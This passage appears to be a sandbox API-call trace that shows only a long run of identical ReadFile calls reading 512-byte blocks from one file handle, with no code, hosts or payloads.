lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.290] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.291] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.291] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.291] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.291] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.291] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.291] ReadFile (in: hFile=0x58, 
lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.291] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.291] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.291] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.291] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.291] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.292] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.292] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.292] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.292] ReadFile 
(in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.292] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.292] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.292] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.292] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.292] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.292] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.292] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.368] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 
[0127.368] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.368] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.368] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.368] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.368] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.368] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.368] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.368] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.368] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, 
lpOverlapped=0x0) returned 1 [0127.369] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.369] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.369] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.369] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.369] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.369] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.369] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.369] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.369] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, 
lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.369] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.370] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.370] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.370] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.370] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.370] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.370] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.370] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.370] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: 
lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.371] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.371] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.371] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.371] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.371] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.371] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.371] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.371] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.371] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, 
lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.372] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.372] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.372] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.372] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.372] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.372] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.372] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.372] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.372] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.373] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.373] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.373] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.373] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.373] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.373] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.373] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.373] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.373] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.374] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.374] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.374] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.374] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.374] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.374] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.374] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.374] ReadFile (in: hFile=0x58, 